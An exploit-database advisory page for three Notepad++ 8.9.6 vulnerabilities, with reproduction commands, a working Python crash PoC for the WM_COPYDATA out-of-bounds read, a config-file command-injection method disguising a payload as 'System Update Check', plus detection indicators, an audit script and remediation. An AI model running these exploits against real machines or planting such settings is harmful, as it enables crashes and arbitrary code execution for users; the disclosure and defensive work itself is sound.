High CVE-2026-48770, CVE-2026-48778, CVE-2026-48800 unpatched

Notepad++ <= 8.9.6 Multiple Vulnerabilities (CVE-2026-48770, CVE-2026-48778, CVE-2026-48800)

by atiilla · 2026-05-28

Metadata

| Field | Value |
| --- | --- |
| Date Added | 2026-05-28 |
| Last Updated | N/A |
| Author / Researcher | atiilla |
| CVE / Advisory | CVE-2026-48770, CVE-2026-48778, CVE-2026-48800 |
| Category | binary |
| Severity | High |
| CVSS Score | 5.0 / 7.8 / 7.8 |
| Status | Patched |
| Tags | Notepad++, Windows, OOB-read, DoS, command-injection, config.xml, shortcuts.xml, local |
| Related | N/A |

Affected Target

| Field | Value |
| --- | --- |
| Software / System | Notepad++ |
| Versions Affected | Notepad++ <= 8.9.6 |
| Language / Platform | Python, PowerShell, XML payloads on Windows 10/11 |
| Authentication Required | Partial (local user/session interaction) |
| Network Access Required | Local only |

Summary

This PoC set covers three Notepad++ vulnerabilities affecting versions up to 8.9.6. CVE-2026-48770 demonstrates an out-of-bounds read crash by sending malformed WM_COPYDATA data to a running Notepad++ process. CVE-2026-48778 and CVE-2026-48800 demonstrate command execution by controlling values loaded from config.xml and shortcuts.xml, then triggering Notepad++ UI actions that pass attacker-controlled values to process launch functionality.


Vulnerability Details

Root Cause

  • CVE-2026-48770: unsafe message handling for WM_COPYDATA (dwData=3) allows reading beyond expected bounds when input is not properly terminated.
  • CVE-2026-48778: commandLineInterpreter from %APPDATA%\Notepad++\config.xml is trusted and later invoked through UI flow without sufficient validation.
  • CVE-2026-48800: <UserDefinedCommands> entries from %APPDATA%\Notepad++\shortcuts.xml are loaded and passed to command execution paths without sanitization.

Attack Vector

  1. CVE-2026-48770: attacker process in the same interactive Windows session sends crafted WM_COPYDATA to a running Notepad++ instance.
  2. CVE-2026-48778: attacker-controlled config.xml (direct overwrite or -settingsDir) is loaded; user triggers File -> Open Containing Folder -> cmd.
  3. CVE-2026-48800: attacker-controlled shortcuts.xml (direct overwrite or -settingsDir) is loaded; user clicks injected command in the Run menu.

Impact

  • CVE-2026-48770: application crash / denial of service.
  • CVE-2026-48778: arbitrary command execution in user context.
  • CVE-2026-48800: arbitrary command execution in user context.

Environment / Lab Setup

OS:          Windows 10/11
Target:      Notepad++ <= 8.9.6
Attacker:    Authorized local tester in same session
Tools:       Python 3.x, PowerShell, Notepad++

Setup Steps

python poc_CVE-2026-48770.py
python poc_CVE-2026-48778.py --mode direct --payload calc.exe
python poc_CVE-2026-48800.py --mode direct --payload calc.exe --name "System Update Check"

Proof of Concept

Step-by-Step Reproduction

  1. CVE-2026-48770 (crash)

    powershell -ExecutionPolicy Bypass -File payloads\poc_CVE-2026-48770.ps1
    # or:
    python poc_CVE-2026-48770.py
    
  2. CVE-2026-48778 (config.xml command execution)

    python poc_CVE-2026-48778.py --mode direct --payload calc.exe
    # Trigger in Notepad++: File -> Open Containing Folder -> cmd
    python poc_CVE-2026-48778.py --mode direct --restore
    
  3. CVE-2026-48800 (shortcuts.xml command execution)

    python poc_CVE-2026-48800.py --mode direct --payload calc.exe --name "System Update Check"
    # Restart Notepad++, then click Run -> System Update Check
    python poc_CVE-2026-48800.py --mode direct --restore
    

Exploit Code

See poc_CVE-2026-48770.py, poc_CVE-2026-48778.py, and poc_CVE-2026-48800.py in this folder.

Expected Output

[+] Found Notepad++ HWND: 0x000A08B4
[*] Sending malformed WM_COPYDATA (dwData=3, cbData=8192, no NUL terminator)...
[+] SendMessageTimeout returned 0 - Notepad++ likely crashed (OOB read -> 0xc0000005)

Screenshots / Evidence

  • Upstream repository includes a demo animation (demo.gif) showing CVE-2026-48778 trigger flow.
  • Add local lab screenshots under screenshots/ if additional evidence is needed.

Detection & Indicators of Compromise

- Unexpected changes to %APPDATA%\Notepad++\config.xml or shortcuts.xml
- Unexpected process execution (for example calc.exe) spawned from Notepad++ UI actions
- Crash events for notepad++.exe with access violation signatures around WM_COPYDATA handling
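
The first two indicators can be checked directly against the settings files. The following audit script is an added example, not part of the upstream PoC repository: it flags a `commandLineInterpreter` value outside an allowlist and any Run-menu command missing from an approved baseline. The XML layout (`GUIConfig name="commandLineInterpreter"` element text, `UserDefinedCommands/Command` entries), the allowlist, the baseline and the sample files are assumptions constructed for illustration.

```python
# Added example: audit Notepad++ settings for the values abused by
# CVE-2026-48778 / CVE-2026-48800. XML layout and allowlist are assumptions.
import hashlib
import xml.etree.ElementTree as ET

# Assumed allowlist of interpreter values; tune to your environment.
ALLOWED_INTERPRETERS = {"cmd", "cmd.exe", "powershell", "powershell.exe"}

def fingerprint(name, command):
    """Stable ID for a Run-menu entry: SHA-256 over name and command text."""
    return hashlib.sha256(f"{name}\x00{command}".encode("utf-8")).hexdigest()

def audit_config(config_xml):
    """Return findings for commandLineInterpreter values outside the allowlist."""
    findings = []
    root = ET.fromstring(config_xml)
    for node in root.iter("GUIConfig"):
        if node.get("name") != "commandLineInterpreter":
            continue
        value = (node.text or "").strip()
        if value.lower() not in ALLOWED_INTERPRETERS:
            findings.append(("config.xml", "commandLineInterpreter", value))
    return findings

def audit_shortcuts(shortcuts_xml, baseline):
    """Return Run-menu commands whose fingerprint is not in the approved baseline."""
    findings = []
    root = ET.fromstring(shortcuts_xml)
    for cmd in root.iterfind("./UserDefinedCommands/Command"):
        name, text = cmd.get("name", ""), (cmd.text or "").strip()
        if fingerprint(name, text) not in baseline:
            findings.append(("shortcuts.xml", name, text))
    return findings

# Constructed sample inputs (not taken from a real system).
SAMPLE_CONFIG = """<NotepadPlus><GUIConfigs>
  <GUIConfig name="commandLineInterpreter">calc.exe</GUIConfig>
</GUIConfigs></NotepadPlus>"""
SAMPLE_SHORTCUTS = """<NotepadPlus><UserDefinedCommands>
  <Command name="Get PHP help" Ctrl="no" Alt="yes" Shift="no" Key="112">https://www.php.net/$(CURRENT_WORD)</Command>
  <Command name="System Update Check" Ctrl="no" Alt="no" Shift="no" Key="0">calc.exe</Command>
</UserDefinedCommands></NotepadPlus>"""
BASELINE = {fingerprint("Get PHP help", "https://www.php.net/$(CURRENT_WORD)")}

if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG) + audit_shortcuts(SAMPLE_SHORTCUTS, BASELINE):
        print("[!]", *finding)
```

On a real host, read the two files from %APPDATA%\Notepad++ (and from any directory passed with -settingsDir) and build the baseline from a known-good copy.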

Remediation

| Action | Detail |
| --- | --- |
| Patch | Update Notepad++ to 8.9.6.1 or later |
| Workaround | Restrict write access to %APPDATA%\Notepad++ files; avoid loading untrusted settings directories |
| Config Hardening | Monitor/alert on suspicious changes to config.xml and shortcuts.xml; enforce application allowlisting |

References


Notes

Auto-ingested from https://github.com/atiilla/Notepad-8.9.6-PoC on 2026-05-28.

poc_CVE-2026-48770.py
#!/usr/bin/env python3
# CVE-2026-48770 - Notepad++ OOB Read via WM_COPYDATA (crash PoC)
import ctypes
import ctypes.wintypes
import sys

WM_COPYDATA = 0x004A
SMTO_ABORTIFHUNG = 0x0002

class COPYDATASTRUCT(ctypes.Structure):
    _fields_ = [
        ("dwData", ctypes.wintypes.LPARAM),
        ("cbData", ctypes.wintypes.DWORD),
        ("lpData", ctypes.c_void_p),
    ]

user32 = ctypes.windll.user32

hwnd = user32.FindWindowW("Notepad++", None)
if not hwnd:
    print("[-] Notepad++ not found - open it first")
    sys.exit(1)
print(f"[+] Found Notepad++ HWND: 0x{hwnd:08X}")

cbData = 8192
buf = ctypes.create_string_buffer(b"\x41" * cbData)  # no NUL terminator

cds = COPYDATASTRUCT()
cds.dwData = 3
cds.cbData = cbData
cds.lpData = ctypes.cast(buf, ctypes.c_void_p).value

print(f"[*] Sending malformed WM_COPYDATA (dwData=3, cbData={cbData}, no NUL terminator)...")

result = ctypes.wintypes.DWORD(0)
ret = user32.SendMessageTimeoutW(
    hwnd, WM_COPYDATA, 0, ctypes.byref(cds),
    SMTO_ABORTIFHUNG, 2000, ctypes.byref(result)
)

if ret == 0:
    print("[+] SendMessageTimeout returned 0 - Notepad++ likely crashed (OOB read -> 0xc0000005)")
else:
    print(f"[-] No crash (ret={ret}) - may be patched")